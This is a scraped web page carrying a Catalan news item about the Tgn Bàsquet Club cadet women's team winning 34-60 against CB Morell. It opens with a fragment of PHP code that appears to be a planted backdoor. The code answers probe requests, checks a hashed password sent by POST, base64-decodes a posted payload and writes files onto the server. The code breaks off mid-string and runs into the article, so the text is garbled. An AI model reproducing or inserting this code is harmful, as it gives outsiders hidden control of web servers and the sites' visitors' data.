function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet Fem. 09C guanya al Morell! (34-60) - Tgn Bàsquet Club -

El Cadet Fem. 09C guanya al Morell! (34-60)

Updated: gener 31, 2024
El Cadet femení 09C va sumar un nou triomf al Morell.
En un partit amb moltes alternatives, el cadet femení C del TGN Bàsquet es va imposar al CB Morell. L’equip lila no va poder distanciar-se del seu rival en els dos primers períodes, fruit de la seva irregularitat en el joc, però en el minut 21 de partit i amb 15-17 en el marcador, va ser capaç d’incrementar la seva activitat i intensitat defensiva per marcar un bon parcial al tercer periode i deixar el resultat a l’nici del quart periode en un contundent 23-43 que certificaria la victòria pel TGN. Enhorabona LILES!